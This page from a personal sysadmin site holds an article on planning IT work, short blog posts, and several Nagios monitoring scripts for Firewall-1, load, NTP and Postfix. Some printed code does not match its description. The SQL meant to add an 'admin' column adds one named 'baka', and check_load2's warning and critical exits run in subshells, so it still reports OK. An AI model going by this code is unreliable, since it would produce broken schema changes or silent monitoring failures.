"They [hackers] tend to be careful and orderly in their intellectual lives and chaotic elsewhere. Their code will be beautiful, even if their desks are buried in 3 feet of crap."

From "The new hacker's dictionary"

I realize that keeping a planning is definitely not one of the favorite activities for most people in IT. Most of them seem to abhor the whole task, or fail to see its importance. Also, most are of the opinion that they don't have enough time as it is and that there is absolutely no way that they can fit in the upkeep of a personal planning.

Now here's a little secret: the one thing that can help you keep your workload in check IS a planning! By keeping record of all of your projects and other activities you can show management how heavily you're loaded and at which points in time you will be available for additional duties. By providing management with these details they will be able to make decisions like lowering your workload, or adding more people to the workforce.

In this article I will discuss the aspects of making and maintaining a proper personal planning. I will touch on the following subjects:

Personal time vs. Project time

A personal planning is what dictates your day-to-day activities. You use it to keep track of meetings, miscellaneous smaller tasks and time slots that you have reserved for projects. You could say that it's your daily calendar and most people will actually use one (a calendar that is) for this task. In daily life your colleagues and supervisor can use your personal planning to see when you're available for new tasks.

A project planning on the other hand is an elaborate schedule, which dictates the flow of a large project. Each detail will be described meticulously and will receive its own place in time. Depending on the structure of your organization such a plan will be drafted either by yourself, or by so-called project managers who have been specifically hired for that task.

Tools of the trade

"Life is what happens to you, when you're making other plans."

John Lennon

Keeping your personal calendar

I think it's safe to assume that everyone has the basic tools that are needed to keep track of your personal planning. Just about every workstation comes with at least some form of calendar software, which will be more or less suitable.

Microsoft Outlook and Exchange come with a pretty elaborate calendar, as well as a To Do list. These can share information transparently, so you can easily assign a task a slot in your personal planning. Each event in your calendar can be opened up to add very detailed information regarding each task. Also, you and your colleagues can give each other access to your calendars if your organization has a central Exchange server at its disposal.

One of the down sides to this Exchange is the fact that it isn't very easy to keep track of your spent hours in a transparent manner. It allows you to create a second calendar in a separate window, but that doesn't make for easy comparison. You could also try to double book your whole calendar for this purpose, but that would get downright messy.

Looking at the other camp, all Apple Macintosh systems come supplied with the iCal application. It is not as comprehensive as the calendar functions of Exchange, but it is definitely workable. iCal comes with most of the features you would expect, like a To Do list and the possibility to share you calendar with your colleagues. However, this requires that you set up either a .Mac account, or a local WEBDAV server.

A screenshot of iCal

One of the nice things about iCal is the fact that it allows you to keep multiple calendars in one window, thus making it easier to keep track of time spent on projects. In the example shown above the green calendar contains all the events I'd scheduled and the purple calendar shows how my time was really spent.

Finally, I am told that Mozilla's Sunbird software also comes with a satisfactory Calendar. So that could be a nice alternative for those wishing to stick to Linux, or who just have a dislike for the previously mentioned applications.

Keeping track of spent time

It's one thing to enter all of your planned activities into your calendar. Another thing entirely is to keep track of the time you spent. Keeping tabs on how you spend your days gives you the following advantages:

1. Reporting progress towards management.

2. A clear view of which activities are slipping in your schedule.

3. A clear view of which work needs to get rescheduled or even reassigned to somebody else.

However, for some reason there aren't any tools available that focus on this task, at least I haven't been able to find them. Of course there are CRM tools that allow a person to keep track of time spent on different customers, but invariably these tools don't combine this functionality with the planning possibilities that I described earlier.

As I said earlier it's perfectly possible to cram the time you spend on tasks into the same calendar which was used to keep your personal planning in, but that usually gets a bit messy (unless you use iCal). Also, I haven't found any way to create reports from these calendar tools that provide you with a nice comparison between times planned and spent. So for now the best way to create a management-friendly report is still to muck about in your favorite spreadsheet program.

Regarding project planning tools

Most projects are of a much grander scale than your average workweek. There are multiple people to keep track of and each person gets assigned a number of tasks (which in turn get divided sub-tasks and so on). You can imagine that a simple personal calendar will not do.

That's why there is specialized software like Microsoft Project for Windows or PMX for OS X. Tools like these allow you to divide a project into atomic tasks. You can assign multiple resources to each task and all tasks can be interlinked to form dependencies and such. Most tools provide professional functions like Gantt and PERT charts.

A screenshot of MS Project

Making guestimates

In the next few chapters I will ask you to make estimates regarding the time a certain task will take. Often sysadmins will be much too optimistic in their estimates, figuring that "it will take a few hours of tinkering". And it's just that kind of mindset that is detrimental to a good planning.

When making a guestimate regarding such a time frame, clearly visualize all the steps that come with the task at hand. Imagine how much time you would spend on each step, in real life. So keep in mind that computers may choose not to cooperate, that colleagues may be unavailable at times and that you may actually run into some difficulty while performing each step.

So. Have a good idea of how long the task will take? Good! Now double that amount and put that figure up in your planning. Seriously. One colleague recounts of people who multiply their original estimates by Pi and still find that their guestimates are wrong.

One simple rule applies: it is better to arrange for a lot of additional time, than it is to scramble to make ends meet.

Taking the plunge

"It must be Thursday... I never could get the hang of Thursdays."

Douglas Adams ~ "The hitchhiker's guide to the galaxy"

Every beginning is a hard one and this one will be no exception. Your first task will be to gather all the little tidbits that make up your day and then to bring order to the chaos. Here are the steps you will be going through.

1. Make a list of everything you have been doing, are doing right now and will need to do sometime soon. Keep things on a general level.

2. Divide your list into two categories: projects and tasks. In most cases the difference will be that projects are things that need to be tackled in a structural manner that will take a few weeks to finish, whereas tasks can be handled quite easily.

3. Take your list of tasks and break them down into "genres". Exemplary genres from my planning are "security", "server improvements" and "monitoring wish list". The categorized list you've made will be your To Do list. Enter it into your calendar software.

4. For each task decide when it needs to be done and make a guestimate regarding the required time. Start assigning time slots in your calendar to the execution of these activities. I usually divide my days into two parts, each of which gets completely dedicated to one activity. Be sure that you leave plenty of room in your calendar for your projects. Also leave some empty spots to allow for unforeseen circumstances.

Now proceed with the next paragraph to sort out your projects.

The big stuff: handling projects

"Once I broke my problems into small pieces I was able to carry them, just like those acorns: one at a time. ... Be like the squirrel!"

The white stripes ~ "Little acorns"

For each of your projects go through the following loop:

1. Write a short project overview. What is it that needs to be done? When does it need to be done? Who are you doing it for? Who is helping you out?

2. Make a basic time line that tells you which milestones need to be reached in order to attain your goal. For example: if the goal is to have all your servers backed up to tape, exemplary mile stones could be "Select appropriate software/hardware solution", "Acquire software/hardware solution", "Build basic infrastructure" and "Implement backup solution". For each milestone, decide when it needs to be reached.

3. Work out each defined milestone: which granular tasks are parts of the greater whole? For instance, the phase "Select appropriate software/hardware solution" will include tasks such as "Inventory of available software/hardware", "Initial selection of solution", "Testing of initially selected solution" and so on.

4. For each of these atomic tasks, decide how much time will be needed in order to perform it. Use the tips regarding guestimates to decide on the proper figures.

5. Put all the tasks into the time line. Put them in chronological order and include the time you've estimated for each task. Once you're done you've built a basic Gantt chart.

The process of Gannt chart creation

Once you are done, go over the whole project planning and verify that, given the estimated time for each task, you can still make it on time. Discuss your findings with your management so they are know what you are up to and what they can expect from the future.

Inevitable, like taxes and death

"Hackers are often monumentally disorganized and sloppy about dealing with the physical world. ... [Thus] minor maintenance tasks get deferred indefinitely."

From "The new hacker's dictionary"

One of the vitally important facts about planning is that it's not a goal, but an on-going process. Now that you have made your initial planning, you're going to have to perform upkeep. Ad infinitum. The point is that things change and there's no changing that!

Projects fall behind because of many different reasons. Vendors may not deliver on time, colleagues may fail to keep their promises and even you yourself may err at times. Maybe your original planning was too tight, or maybe a task is a lot more complicated than it seemed at first. All in all, your planning will need to be shifted. Depending on the project it is wise to revisit your planning at least once a week. Mark any finished tasks as such and add any delays. Not only will this help you in your daily work, but it will also give management a good idea about the overall progress of your projects.

The same goes for your personal time. Projects need rescheduling, you need to take some unexpected sick leave or J. Random Manager decides that doing an inventory of mouse mats really does need priority above your projects. It is best to revisit your calendar on a daily basis, so you can keep an eye on your week. What will you be doing during the next few days? What should you have done during the past few days? Are you on track when it comes to your To Do list?

Final thoughts

You may think that all of this planning business seems like an awful lot of work. I would be the first to agree with you, because it is! However, as I mentioned at the start of this article: it will be well worth your time. Not only will you be spending your time in a more ordered fashion, but it will also make you look good in the eyes of management.

Drawing a parallel with the Hitchhiker's Guide to the Galaxy you will be the "really hoopy frood, who really knows where his towel is" because when things get messy you will still be organized.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Hacked admin mode into Syslog-ng

2005-11-22 11:09:00

At $CLIENT I've built a centralised logging environment based on Syslog-ng, combined with MySQL. To make any useful from all the data going into the database we use PHP-syslog-ng. However, I've found a bit of a flaw with that software: any account you create has the ability to add, remove or change other accounts... Which kinda makes things insecure.

So yesterday was spent teaching myself PHP and MySQL to such a degree that I'd be able to modify the guy's source code. In the end I managed to bolt on some sort of "admin-mode" which allows you to set an "admin" flag on certain user accounts (thus giving them the capabilities mentioned above).

The updated PHP files can be found in the TAR-ball in the menu of the Sysadmin section. The only thing you'll need to do to make things work is to either:

1. Re-create your databases using the dbsetup.sql script.

2. Add the "admin" column to the "users" table using the following command. ALTER TABLE users ADD COLUMN baka BOOLEAN;


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Added Nagios plugins

2005-09-11 01:00:00

I've added all the custom Nagios monitors I wrote for $CLIENT. They might come in handy for any of you. They're not beauties, but they get the job done.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Nagios and BoKS/Keon

2005-09-11 00:47:00

Major updates in the Sysadmin section! w00t!

In this case a lot of information one of my favourite security tools and Nagios, my new-found love on the monitoring front.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

My article on personal planning

2005-09-07 10:15:00

It has been a very long time in coming, but finally I got around to finishing version 1.0 of my tutorial/article on planning. One thing most people in IT are notoriously bad at is writing and maintaining a project planning (or their personal planning for that matter). I was originally asked by my chef at $PREV-CLIENT to write this article, but I never got around to finishing it before i left.

Aniway... It's still version 1.0, so it's still quite rough around the edges. I hope to get a whole load of reviews from friend/colleagues before submitting it to ;Login: for publication. In the mean time you guys can find it in the Sysadmin section. I hope you enjoy reading it!


kilala.nl tags: , ,

View or add comments (curr. 0)

Sysadmin toolkit

2005-08-02 15:34:00

It's been long in coming, but after years I got 'round to putting together my Sysadmin's Toolkit. Check it out on the left, for an introduction and some photographs.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Jumpstart, FLAR and console servers

2005-07-01 15:22:00

Currently at the office, so I'll make it a quick one :3

Unfortunately I've been making longer days than I should this week. I mean, it's not a horrendous amount of hours, but still I'd rather be at home relaxing. This week has seen the people in charge at $CLIENT up the prio on a centralised Jumpstart/FLAR server, which I was supposed to deliver. I was already working on it part time, but now they have me working on it full time. It's quite a lot of fun, since I get to work together with other departments within $CLIENT, thus making more friends and allies ^_^

I also had to struggle with Perle IOLan+ terminal servers this week, since we need to be able to use the serial management port on our Sun servers. Yes, admittedly these boxen do work for this purpose, but I'd rather have a proper console server instead of a piece of kit which was originally meant as a dial-in box for dumb terminals or modems. Let's just say that I dream of Cyclades.

Oh! Last wednesday was my birthday by the way... I've hit 26 now :3 We went out for a lovely dinner at Konichi wa in Utrecht, since we wanted to try out a different Japanese restaurant for a change. I must say: their price/quality proportions are really good! If you ever are in the neighbourhood of Utrecht and feel like Japanese, head over there! They're at Mariaplaats 9. BTW, they don't just to Tepan Yaki... They also serve excellent sushi and will make you _ramen_ or _udon_ noodles if you ask nicely!!! My new favourite restaurant :9


kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_fwm

2005-07-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Basic monitor that checks if the Checkpoint Firewall-1 Management software is up and running. It checks for a number of processes and ports.

This script was quickly hacked together for my current customer, as a Q&D solution for their monitoring needs. It's no beauty, but it works. Written in ksh and tested with:

The script sends a Critical if:

A) One or more processes are not running, or

B) One or more ports are not available for connections.

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!


#!/usr/bin/bash
#
# Firewall-1 process monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 19-06-2006
# 
# Usage: ./check_fwm
#
# Description:
# This plugin determines whether the Firewall-1 management
# software is running properly. It will check the following:
# * Are all required processes running?
# * Are all the required TCP/IP ports open?
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
#
# Output:
# The script retunrs a CRIT when one of the criteria mentioned
# above is not matched.
#

# Host OS check and warning message
if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Firewall-1 monitor plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

check_processes()
{
	PROCESS="0"
	# PROCLIST="cpd fwd fwm cpwd cpca cpmad cplmd cpstat cpshrd cpsnmpd"
	PROCLIST="cpd fwd fwm cpwd cpca cpmad cpstat cpsnmpd"
	for PROC in `echo $PROCLIST`; do
	if [ `ps -ef | grep $PROC | grep -v grep | wc -l` -lt 1 ]; then PROCESS=1;fi
	done

	if [ $PROCESS -eq 1 ]; then 
		echo "FWM NOK - One or more processes not running"
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_ports()
{
	PORTS="0"
	PORTLIST="256 257 18183 18184 18187 18190 18191 18192 18196 18264"
	for NUM in `echo $PORTLIST`; do
	if [ `netstat -an | grep LISTEN | grep $NUM | grep -v grep | wc -l` -lt 1 ]; then PORTS=1;fi
	done

	if [ $PORTS -eq 1 ]; then 
		echo "FWM NOK - One or more TCP/IP ports not listening."
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_processes
check_ports

echo "FWM OK - Everything running like it should"
exitstatus=$STATE_OK
exit $exitstatus

kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_load2

2005-07-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

We are currently in the process of distributing a standard set of Nagios monitoring scripts to over 300 client systems. One of the metrics we would like to monitor is the three load averages (or as Dr. Gunther calls them: the LaLaLa triplets).

Since these 300 servers aren't all alike, we are bound to run into systems with one, two, four, eight or more processors. That way there is no nice way of making one standard configuration, since you'll have to define separate LA levels for WARN and CRIT. Why? Cause a quad system can take much more load than a single core system.

One way to get around this would be by defining separate host groups, based on the amount of processors in a system. You could then define a unique check_load command for each CPU host group.

I've gone the other way around though...

My work-around for this is by replacing check_load with check_load2. This script takes no command line parameters and works on the basis of standard multipliers. We are of the opinion that the number of processors multiplied by a certain factor (150%? 200%? and so on) is a good enough way to define these WARN and CRIT levels. These multipliers can easily be modified (at the top of the script) to fit what -you- think is a worrying level of activity.

This script was tested on Redhat ES3, Solaris 8 and Mac OS X 10.4. It should run on other versions of these OSes as well.

EDIT:

Oh! Just like my other recent Nagios scripts, check_load2 comes with a debugging option. Set $DEBUG at the top of the file to anything larger than zero and the script will dump information at various stages of its execution.


#!/usr/bin/bash
#
# CPU load monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide, the Netherlands
# Last Modified: 22-06-2006
# 
# Usage: ./check_load2
#
# Description:
#   Ethan's original version of the check_load script is very flexible.
# It allows you to specifically set WARN and CRIT levels regarding 
# the CPU load of the system you're monitoring.
#   However: flexibility is not always a good thing. Say for example that
# you want to monitor the CPU load across a few hundred of systems having
# various CPU configurations. You -could- define host groups for single, dual
# quad (and so on) processor systems and assign unique check_load command
# definitions to each group.
#   Or you could write a script which checks the amount of active CPUs and
# then makes an educated guess at the WARN and CRIT levels for the system. 
# In most cases this should really be enough. 
#
# Limitations:
# This script should work properly on all implementations of Linux, Solaris
# and Mac OS X.
#
# Output:
# Depending on the levels defined at the top of the script,
# the script returns an OK, WARN or CRIT to Nagios based on CPU load.
#
# Other notes:
#   If you ever run into problems with the script, set the DEBUG variable
# to 1. I'll need the output the script generates to do troubleshooting.
# See below for details.
#   I realise that all the debugging commands strewn throughout the script
# may make things a little harder to read. But in the end I'm sure it was
# well worth adding them. It makes troubleshooting so much easier. :3
#

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh


### DEBUGGING SETUP ###
# Cause you never know when you'll need to squash a bug or two
DEBUG="1"
DEBUGFILE="/tmp/foobar"
rm $DEBUGFILE


### REQUISITE NAGIOS COMMAND LINE STUFF ###

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Semi-intelligent CPU load monitor plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done


### SETTING UP THE WARN AND CRIT FACTORS ###
# Please be aware that these are -factors- and not real load average values.
# The numbers below will be multiplied by the amount of processors to come
# to the desired WARN and CRIT levels. Feel free to adjust these factors, if
# you feel the need to tweak them.

WARN_1min="2.00"
WARN_5min="1.50"
WARN_15min="1.50"
[ $DEBUG -gt 0 ] && echo "Factors: warning factors are at $WARN_1min, $WARN_5min, $WARN_15min." >> $DEBUGFILE

CRIT_1min="3.00"
CRIT_5min="2.00"
CRIT_15min="2.00"
[ $DEBUG -gt 0 ] && echo "Factors: critical factors are at $CRIT_1min, $CRIT_5min, $CRIT_15min." >> $DEBUGFILE


### DEFINING SUBROUTINES ###

function gather_procs_linux()
{
    NUMPROCS=`cat /proc/cpuinfo | grep ^processor | wc -l` 
[ $DEBUG -gt 0 ] && echo "Numprocs: Number of processors detected is $NUMPROCS." >> $DEBUGFILE
} 

function gather_procs_sunos()
{
    NUMPROCS=`/usr/bin/mpstat | grep -v CPU | wc -l` 
[ $DEBUG -gt 0 ] && echo "Numprocs: Number of processors detected is $NUMPROCS." >> $DEBUGFILE
}

function gather_procs_darwin()
{
    NUMPROCS=`/usr/bin/hostinfo | grep "Default processor set" | awk '{print $8}'` 
[ $DEBUG -gt 0 ] && echo "Numprocs: Number of processors detected is $NUMPROCS." >> $DEBUGFILE
}

function gather_load_linux()
{
    REAL_1min=`cat /proc/loadavg | awk '{print $1}'`
    REAL_5min=`cat /proc/loadavg | awk '{print $2}'`
    REAL_15min=`cat /proc/loadavg | awk '{print $3}'`
[ $DEBUG -gt 0 ] && echo "Gather_load: Detected load averages are $REAL_1min, $REAL_5min, $REAL_15min." >> $DEBUGFILE
}

function gather_load_sunos()
{
    REAL_1min=`w | grep "load average" | awk -F, '{print $4}' | awk '{print $3}'`
    REAL_5min=`w | grep "load average" | awk -F, '{print $5}'`
    REAL_15min=`w | grep "load average" | awk -F, '{print $6}'`
[ $DEBUG -gt 0 ] && echo "Gather_load: Detected load averages are $REAL_1min, $REAL_5min, $REAL_15min." >> $DEBUGFILE
}

function gather_load_darwin()
{
    REAL_1min=`sysctl -n vm.loadavg | awk '{print $1}'`
    REAL_5min=`sysctl -n vm.loadavg | awk '{print $2}'`
    REAL_15min=`sysctl -n vm.loadavg | awk '{print $3}'`
[ $DEBUG -gt 0 ] && echo "Gather_load: Detected load averages are $REAL_1min, $REAL_5min, $REAL_15min." >> $DEBUGFILE
}

function check_load()
{
    WARN="0"; CRIT="0"

    [ `echo "if(($NUMPROCS * $WARN_1min) > $REAL_1min) 0; if(($NUMPROCS * $WARN_1min) <= $REAL_1min) 1" | bc` -gt 0 ] && let WARN=$WARN+1
    [ `echo "if(($NUMPROCS * $WARN_5min) > $REAL_5min) 0; if(($NUMPROCS * $WARN_5min) <= $REAL_5min) 1" | bc` -gt 0 ] && let WARN=$WARN+1
    [ `echo "if(($NUMPROCS * $WARN_15min) > $REAL_15min) 0; if(($NUMPROCS * $WARN_15min) <= $REAL_15min) 1" | bc` -gt 0 ] && let WARN=$WARN+1
[ $DEBUG -gt 0 ] && echo "Check_load: warning levels are `echo "$NUMPROCS * $WARN_1min"|bc`, `echo "$NUMPROCS * $WARN_5min"|bc`, `echo "$NUMPROCS * $WARN_15min"|bc`," >> $DEBUGFILE

    [ `echo "if(($NUMPROCS * $CRIT_1min) > $REAL_1min) 0; if(($NUMPROCS * $CRIT_1min) <= $REAL_1min) 1" | bc` -gt 0 ] && let CRIT=$CRIT+1
    [ `echo "if(($NUMPROCS * $CRIT_5min) > $REAL_5min) 0; if(($NUMPROCS * $CRIT_5min) <= $REAL_5min) 1" | bc` -gt 0 ] && let CRIT=$CRIT+1
    [ `echo "if(($NUMPROCS * $CRIT_15min) > $REAL_15min) 0; if(($NUMPROCS * $CRIT_15min) <= $REAL_15min) 1" | bc` -gt 0 ] && let CRIT=$CRIT+1
[ $DEBUG -gt 0 ] && echo "Check_load: critical levels are `echo "$NUMPROCS * $CRIT_1min"|bc`, `echo "$NUMPROCS * $CRIT_5min"|bc`, `echo "$NUMPROCS * $CRIT_15min"|bc`," >> $DEBUGFILE

    [ $WARN -gt 0 ] && (echo "NOK: load averages are at $REAL_1min, $REAL_5min, $REAL_15min"; exit $STATE_WARNING)
    [ $CRIT -gt 0 ] && (echo "NOK: load averages are at $REAL_1min, $REAL_5min, $REAL_15min"; exit $STATE_CRITICAL)
}

### FINALLY, THE MAIN ROUTINE ###

NUMPROCS="0"

case `uname` in
            Linux) gather_procs_linux; gather_load_linux; check_load;;
            Darwin) gather_procs_darwin; gather_load_darwin; check_load;;
            SunOS) gather_procs_sunos; gather_load_sunos; check_load;;
            *) echo "OS not supported by this check."; exit 1;;
esac

# Nothing caused us to exit early, so we're okay.
echo "OK - load averages are at $REAL_1min, $REAL_5min, $REAL_15min"
exit $STATE_OK


kilala.nl tags: , , ,

View or add comments (curr. 7)

Nagios script: check_ntp_s

2005-07-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Basic monitor that checks if the server is up and running. It checks for a process and whether the server has drifted from its higher level Stratum server.

This script was quickly hacked together for my current customer, as a Q&D solution for their monitoring needs. It's no beauty, but it works. Written in ksh and tested with:

The script sends a Critical if:

A) One or more processes are not running, or

B) The server's clock has drifted too far from its higher level Stratum server.

Requires the "check_ntp" plugin which is part of the default monitor package.

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!



#!/usr/bin/bash
#
# NTP server process monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 19-06-2006
# 
# Usage: ./check_ntp_s
#
# Description:
# This plugin determines whether the Nagios client is functioning 
# properly as an NTP server. It does this by checking:
# * Are all required processes running?
# * Is the server's time up to scratch with its higher stratum server?
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
#
# Output:
# The script returns a CRIT when one of the abovementioned criteria
# is not matched.
#

# Host OS check and warning message
if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "NTP server plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

check_processes()
{
	PROCESS="0"
	if [ `ps -ef | grep xntpd | grep -v grep | grep -v nagios | wc -l` -lt 1 ]; then PROCESS=1;fi
	if [ $PROCESS -eq 1 ]; then 
		echo "NTP-S NOK - One or more processes not running"
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_time()
{
	TIME="0"
	#SERVERS="ntp0.nl.net ntp1.nl.net ntp2.nl.net"
	SERVERS="nl-ams99z-a02-01"
	for SERV in `echo $SERVERS`; do
		if [ `/usr/local/nagios/libexec/check_ntp -H $SERV | awk '{print $2}'` != "OK:" ]; then
			TIME=1
		else
			TIME=0
			break
		fi
	done
	if [ $TIME -eq 1 ]; then
		echo "NTP-S NOK - Time not in synch with higher Stratum."
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_processes
check_time

echo "NTP-S OK - Everything running like it should"
exitstatus=$STATE_OK
exit $exitstatus


kilala.nl tags: , , ,

View or add comments (curr. 1)

Nagios script: check_postfix

2005-07-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Basic monitor that checks if Postfix is up and running. It checks for a number of processes and ports.

This script was quickly hacked together for my current customer, as a Q&D solution for their monitoring needs. It's no beauty, but it works. Written in ksh and tested with:

The script sends a Critical if:

A) One or more processes are not running, or

B) One or more ports are not available for connections.

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!



#!/usr/bin/bash
#
# Postfix process monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 19-06-2006
# 
# Usage: ./check_postfix
#
# Description:
# This plugin determines whether the Postfix SMTP server
# is running properly. It will check the following:
# * Are all required processes running?
# * Are all the required TCP/IP ports open?
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
#
# Output:
# Script returns a CRIT when one of the abovementioned criteria is 
# not matched
#

# Host OS check and warning message
if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Postfix monitor plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

check_processes()
{
	PROCESS="0"
	PROCLIST="smtpd qmgr pickup master sendmail"
	for PROC in `echo $PROCLIST`; do
	if [ `ps -ef | grep $PROC | grep -v grep | wc -l` -lt 1 ]; then 
		if [ $PROC == "smtpd" ]; then
			if [ `ps -ef | grep proxymap | grep -v grep | wc -l` -lt 1 ]; then
				PROCESS=1
			else
				PROCESS=0
			fi
		else
			PROCESS=1
		fi
	fi
	done

	if [ $PROCESS -eq 1 ]; then 
		echo "SMTP-S NOK - One or more processes not running"
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_ports()
{
	PORTS="0"
	PORTLIST="25"
	for NUM in `echo $PORTLIST`; do
	if [ `netstat -an | grep LISTEN | grep $NUM | grep -v grep | wc -l` -lt 1 ]; then PORTS=1;fi
	done

	if [ $PORTS -eq 1 ]; then 
		echo "SMTP-S NOK - One or more TCP/IP ports not listening."
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_processes
check_ports

echo "SMTP-S OK - Everything running like it should"
exitstatus=$STATE_OK
exit $exitstatus



kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_retro_client

2005-07-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Basic monitor that checks if the Retrospect client is up and running.

This script was quickly hacked together for my current customer, as a Q&D solution for their monitoring needs. It's no beauty, but it works. Written in ksh and tested with:

The script sends a Critical if the required process is not running.

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!



#!/usr/bin/bash
#
# Retrospect Backup Client monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 19-06-2006
# 
# Usage: ./check_retro_client
#
# Description:
# This plugin determines whether the Retrospect backup client 
# is running properly. It will check the following:
# * Are all required processes running?
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
#
# Output:
# The script returns a CRIT when the abovementioned criteria are
# not matched
#

# Host OS check and warning message
if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Retrospect Backup Client monitor plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
